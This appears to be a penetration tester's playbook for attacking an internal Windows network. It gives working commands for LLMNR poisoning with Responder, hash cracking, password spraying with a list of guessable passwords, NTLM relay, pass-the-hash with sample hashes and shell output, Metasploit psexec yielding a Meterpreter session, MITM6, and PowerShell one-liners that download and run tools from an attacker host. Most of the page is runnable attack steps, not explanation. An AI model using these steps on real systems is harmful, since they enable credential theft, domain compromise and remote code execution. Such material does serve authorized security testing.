Basic Internal Network test
Slightly less than the minimum standard

Host Discovery

Nmap Ping Scan Private Ranges and start responder
1
responder -i eth0
2
3
nmap -sn -n 10.0.0.0/8 | tee -a Targets.tmp
4
nmap -sn -n 172.16.0.0/12 | tee -a Targets.tmp
5
nmap -sn -n 192.168.0.0/16 | tee -a Targets.tmp
6
7
# Loud so only use if required
8
masscan 10.0.0.0/8 -p80,445,22 --rate 100000000 | tee -a Targets.tmp
9
masscan 172.16.0.0/12 -p80,445,22 --rate 100000000 | tee -a Targets.tmp
10
masscan 192.168.0.0/16 -p80,445,22 --rate 100000000 | tee -a Targets.tmp
11
12
#Note down IP addresses from responder
13
responder -I eth0
14
cat /usr/share/responder/logs/Responder-Session.log | grep answer | awk '{print $11}' | sort -u | tee -a Targets.tmp
15
16
#Note current IP address & scan range
17
ifconfig
18
nmap --top-ports 10 10.0.0.1/24 -Pn | tee -a Targets.tmp
19
20
#netdiscover
21
netdiscover -i eth0 -P
22
23
#NBTScan
24
nbtscan 192.168.1.0/24
Copied!
Now cat grep and sort the IP addresses into a file called Targets.txt

Nmap Scans

1
mkdir Scans
2
nmap -p 21 -n --open -iL targets -oA Scans/ftp
3
nmap -p 22 -n --open -iL targets -oA Scans/ssh
4
nmap -p 23 -n --open -iL targets -oA Scans/telnet
5
nmap -p 80 -n --open -iL targets -oA Scans/http
6
nmap -p 443 -n --open -iL targets -oA Scans/https
7
nmap -p 445 -n --open -iL targets -oA Scans/smb
8
nmap -p 3389 -n --open -iL targets -oA Scans/rdp
9
10
cat Scans/ftp.nmap | grep for | cut -d " " -f 5 > ftphosts.txt
11
cat Scans/ssh.nmap | grep for | cut -d " " -f 5 > sshhosts.txt
12
cat Scans/telnet.nmap | grep for | cut -d " " -f 5 > telnethosts.txt
13
cat Scans/http.nmap | grep for | cut -d " " -f 5 > httphosts.txt
14
cat Scans/https.nmap | grep for | cut -d " " -f 5 > httpshosts.txt
15
cat Scans/smb.nmap | grep for | cut -d " " -f 5 > smbhosts.txt
16
cat Scans/rdp.nmap | grep for | cut -d " " -f 5 > rdphosts.txt
Copied!

Scanning

Start Nessus on discovered IP addresses
Run AutoScan.sh against all Targets.txt
Modify if running slowly (thousands of hosts) and reduce the amount of ports it is looking at.
1
#!/bin/bash
2
for Target in $(cat Targets.txt)
3
do
4
echo "---------------------------------------------------------------" | tee -a Scanner.log
5
echo "Auto Scanner" | tee -a Scanner.log
6
echo "$Target - Scanned: $(date)" | tee -a Scanner.log
7
echo "---------------------------------------------------------------" | tee -a Scanner.log
8
echo "" | tee -a Scanner.log
9
echo "---------------------------------------------------------------" | tee -a Scanner.log
10
echo "TCP Scan Started: $(date)" | tee -a Scanner.log
11
echo "---------------------------------------------------------------" | tee -a Scanner.log
12
#Full
13
nmap -Pn -sSVC -O --top-ports 1000 -oN $Target-01-NmapTCP.txt $Target | tee -a Scanner.log
14
#Fast
15
#nmap -Pn -sSVC -O --top-ports 1000 -oN $Target-01-NmapTCP.txt $Target | tee -a Scanner.log
16
echo "---------------------------------------------------------------" | tee -a Scanner.log
17
echo "UDP Scan Started: $(date)" | tee -a Scanner.log
18
echo "---------------------------------------------------------------" | tee -a Scanner.log
19
#Full
20
#nmap -sUV -sC --top-ports 200 -oN $Target-02-NmapUDP.txt $Target | tee -a Scanner.log
21
#Fast
22
nmap -sUV -sC --top-ports 10 -oN $Target-02-NmapUDP.txt $Target | tee -a Scanner.log
23
echo "---------------------------------------------------------------" | tee -a Scanner.log
24
echo "Nikto Scan Started: $(date)" | tee -a Scanner.log
25
echo "---------------------------------------------------------------" | tee -a Scanner.log
26
nikto -p 80,443,8000,8080 -h $Target | tee $Target-03-Nikto.txt | tee -a Scanner.log
27
echo "---------------------------------------------------------------" | tee -a Scanner.log
28
echo "SSL Scan Started: $(date)" | tee -a Scanner.log
29
echo "---------------------------------------------------------------" | tee -a Scanner.log
30
sslscan --show-certificate --no-colour $Target | tee $Target-04-SSLScan.txt | tee -a Scanner.log
31
echo "---------------------------------------------------------------" | tee -a Scanner.log
32
echo "Directory Scan Started: $(date)" | tee -a Scanner.log
33
echo "---------------------------------------------------------------" | tee -a Scanner.log
34
gobuster -u http://$Target/ -w /root/Data/Tools/Wordlists/Dirbuster/Fast.txt -q -e -t 10 | tee -a $Target-05-Directories.txt | tee -a Scanner.log
35
gobuster -k -u https://$Target/ -w /root/Data/Tools/Wordlists/Dirbuster/Fast.txt -q -e -t 10 | tee -a $Target-05-Directories.txt | tee -a Scanner.log
36
done
37
for Target in $(cat Targets.txt)
38
do
39
cat $Target-01-NmapTCP.txt | grep /tcp | grep open >> "$Target"_Ports.txt 2> /dev/null
40
cat $Target-02-NmapUDP.txt | grep /udp | grep open | grep -v filtered >> "$Target"_Ports.txt 2> /dev/null
41
(
42
input="$Target"_Ports.txt
43
while IFS= read -r port
44
do
45
echo "$Target":"$port" >> ServicesList.txt
46
done < "$Target"_Ports.txt
47
)
48
rm *_Ports.txt
49
done
50
echo
51
echo "---------------------------------------------------------------" | tee -a Scanner.log
52
echo "The following services were found:" | tee -a Scanner.log
53
echo "---------------------------------------------------------------" | tee -a Scanner.log
54
cat ServicesList.txt | tee -a Scanner.log
55
done
Copied!

Check responder for hashes and crack with hashcat

1
hashcat --force -m 5600 Hashes.txt /path/to/wordlist -r /path/to/rules
Copied!
Once you have some hashes test with several wordlists, if none work then scrape the clients website for words with cewl
1
cewl -w clientwordlist.txt -d 5 -m 8 https://www.clientsite.com/
Copied!
Then repeat the cracking process with a good rule list.

Domain enumeration

Get DC List
1
# Windows command
2
nltest /DCLIST:domain.local
3
4
# Linux Commands
5
cat /etc/resolv.conf
6
7
nmap -p 88,389,636 -iL Targets.txt --open
8
9
for i in (cat Targets.txt); do nslookup $i | grep "dc"; done
10
11
nslookup
12
> set type=all
13
_ldap._tcp.dc._msdcs.DOMAIN
Copied!
Get user list
1
rpcclient -U "domain\\username" 10.0.0.1 (DC)
2
rpcclient gt; enumdomusers
Copied!
Copy list of users to "rpcuserlist.txt" file and sort:
1
cat rpcuserlist.txt | cut -d "[" -f 2 | cut -d "]" -f 1 | sort -u > DomainUsers.txt
Copied!

Password spray domain users

Set a timer for every 30 minutes and rerun this attack.
May be worth checking the password lockout policy with the client if in a sensitive environment.
1
msfconsole -q
2
set rhosts domaincontrollerip
3
use auxiliary/scanner/smb/smb_login
4
set SMBDomain domain
5
set USER_FILE DomainUsers.txt
6
set SMBPass firstpassword
7
date << adds a timestamp
8
run
Copied!
When time is up change the password and rerun.
Passwords to try:
1
Clientname2019
2
Location2019
3
Password12345!
4
Summer2019!
5
Spring2019!
6
Summer2018!
7
Password2018!
8
Welcome2018!
9
Password 2018!
Copied!

Find open file servers

SMB Map

Find open SMB shares which are available unauthenticated
1
for i in $(cat 00-Targets.txt);do smbmap -H $i; done | tee -a SMBMap-Output.txt
Copied!
Find open writable shares and search for authenticated file servers:
1
for i in $(cat Targets.txt);do smbmap -u 'username' -p 'password' -d 'domain' -H $i; done | tee -a SMBMap-Output.txt
2
leafpad SMBMap-Output.txt
3
ctrl + f WRITE (Search for writable folders)
Copied!

EyeWitness

1
python /root/Data/Tools/EyeWitness/EyeWitness.py --all-protocols -x NmapTCP.xml
Copied!

NTLM Relay

Modify Responder.conf to turn off HTTP and SMB
1
[Responder Core]
2
3
; Servers to start
4
SQL = On
5
SMB = Off << turn off
6
Kerberos = On
7
FTP = On
8
POP = On
9
SMTP = On
10
IMAP = On
11
HTTP = Off << turn off
12
HTTPS = On
13
DNS = On
14
LDAP = On
Copied!
Start responder
1
python Responder.py -I <interface> -r -d -w
2
responder -I <interface> -r -d -w
Copied!
Create a list of targets with SMB signing disabled.
1
nmap -n -p 137,139,445 --script=smb-security-mode 192.168.1.0/24 | grep disabled -B 15 | grep for | cut -d " " -f 5 | tee -a smbsigningdisabled.txt
Copied!
Now start ntlmrelayx.py against the targets
1
python /usr/share/doc/python-impacket/examples/ntlmrelayx.py -tf smbsigningdisabled.txt
Copied!
If you capture a high priv users account it will drop the hashes from the system
Now use psexec within metasploit to login to the target
1
msfconsole
2
use exploit/windows/smb/psexec
3
set lhost 192.168.1.1
4
set rhost 192.168.1.11
5
set smbpass e52cac67419a9a224a3b108f3fa6cb6d:8846f7eaee8fb117ad06bdd830b7586c
6
exploit
Copied!

Pass the hash

Either will do, once the enumeration has finished upload the csv files to your attacker machine.
Then run
1
python ntlmrelayx.py -tf smbsigningdisabled.txt
Copied!
1
[email protected]:~# pth-winexe -U WORKGROUP/Administrator%aad3b435b51404eeaad3b435b51404ee:C0F2E311D3F450A7FF2571BB59FBEDE5 //192.168.1.25
2
# Where WORKGROUP is the default WORKGROUP. Can be replaced by a domain name
3
# Administrator: account's name
4
# aad3b435b51404eeaad3b435b51404ee: Empty LM HASH
5
# C0F2E311D3F450A7FF2571BB59FBEDE5: NTLM hash
Copied!
1
[email protected]:~# pth-winexe -U WORKGROUP/Administrator%aad3b435b51404eeaad3b435b51404ee:C0F2E311D3F450A7FF2571BB59FBEDE5 //192.168.1.25 cmd.exe
2
E_md4hash wrapper called.
3
HASH PASS: Substituting user supplied NTLM HASH...
4
Microsoft Windows \[Version 6.3.9600\]
5
(c) 2013 Microsoft Corporation. All rights reserved.
6
7
C:\Windows\system32>whoami
8
Server\Administrator
Copied!
1
[email protected]:~# pth-wmic -U WORKGROUP/Administrator%aad3b435b51404eeaad3b435b51404ee:C0F2E311D3F450A7FF2571BB59FBEDE5 //192.168.1.25 "select Name from Win32_UserAccount"
2
[email protected]:~# pth-wims -U WORKGROUP/Administrator%aad3b435b51404eeaad3b435b51404ee:C0F2E311D3F450A7FF2571BB59FBEDE5 //192.168.1.25 "cmd.exe /c whoami > c:\temp\result.txt"
3
[email protected]:~# pth-smbclient -U WORKGROUP/Administrator%aad3b435b51404eeaad3b435b51404ee:C0F2E311D3F450A7FF2571BB59FBEDE5 //192.168.1.25/c$
4
[email protected]:~# pth-rpcclient -U WORKGROUP/Administrator%aad3b435b51404eeaad3b435b51404ee:C0F2E311D3F450A7FF2571BB59FBEDE5 //192.168.1.25
Copied!
1
[email protected]:~# wmiexec.py -hashes aad3b435b51404eeaad3b435b51404ee:C0F2E311D3F450A7FF2571BB59FBEDE5 [email protected]
2
Impacket v0.9.15 - Copyright 2002-2016 Core Security Technologies
3
4
[*] SMBv3.0 dialect used
5
[!] Launching semi-interactive shell - Careful what you execute
6
[!] Press help for extra shell commands
7
C:\>
Copied!
1
[email protected]:~# apt-get update
2
[email protected]:~# apt-get install freerdp-x11
3
[email protected]:~# xfreerpd /u:richard /d:workgroup /pth:C0F2E311D3F450A7FF2571BB59FBEDE5 /v:192.168.1.25
Copied!
1
msf > use auxiliary/admin/smb/psexec_command
2
msf auxiliary(psexec_command) > set SMBPass aad3b435b51404eeaad3b435b51404ee:C0F2E311D3F450A7FF2571BB59FBEDE5
3
msf exploit(psexec) > set SMBUser Administrator
4
msf exploit(psexec) > set SMBDomain WORKGROUP
5
msf exploit(psexec) > run
6
[*] Started reverse TCP handler on 192.168.1.24:4444
7
[*] 192.168.1.25:445 - Connecting to the server...
8
[*] 192.168.1.25:445 - Authenticating to 192.168.1.25:445|WORKGROUP as user 'administrator'...
9
[*] 192.168.1.25:445 - Selecting PowerShell target
10
[*] 192.168.1.25:445 - Executing the payload...
11
[+] 192.168.1.25:445 - Service start timed out, OK if running a command or non-service executable...
12
[*] Sending stage (957999 bytes) to 192.168.1.25
13
[*] Meterpreter session 1 opened (192.168.1.24:4444 -> 192.168.1.25:49173) at 2017-04-05 22:48:15 +0200
14
15
meterpreter > exit
Copied!
This will output the local hashes if you capture a domain admins NTLM hash.
Once you have this hash, login to the machine with metasploits psexec pass the hash or psexec.py

Bloodhound

Once on the domain as a windows user run the following:
1
powershell -nop -exec bypass -c "IEX(New-Object Net.WebClient).downloadString('http://attackerip/BloodHound.ps1')"
2
powershell -nop -exec bypass -c "IEX(New-Object Net.WebClient).downloadString('http://attackerip/SharpHound.exe')"
Copied!
Once on your attacker machine make sure you have bloodhound installed and then execute:
1
neoj4 console
2
bloodhound
Copied!
Visit 127.0.0.1:7687
Enter your password and upload the csv files you extracted from the target.
Click queries and then find shortest path to domain admin

MITM6

1
git clone https://github.com/fox-it/mitm6.git
2
cd mitm6
3
mitm6 -d domain.local
Copied!
In a new window
1
ntlmrelayx.py -6 -t ldaps://domaincontrollerip -wh fakewpad.domain.local -l data
Copied!
Wait 30 mins to an hour for the IPV6 to update
1
cd data
2
firefox domain_users_by_group.html
Copied!
Review ntlmrelayx.py output and look for new user and password added when a DA logs in
The worst of both worlds: Combining NTLM Relaying and Kerberos delegation
dirkjanm.io
Last modified 1yr ago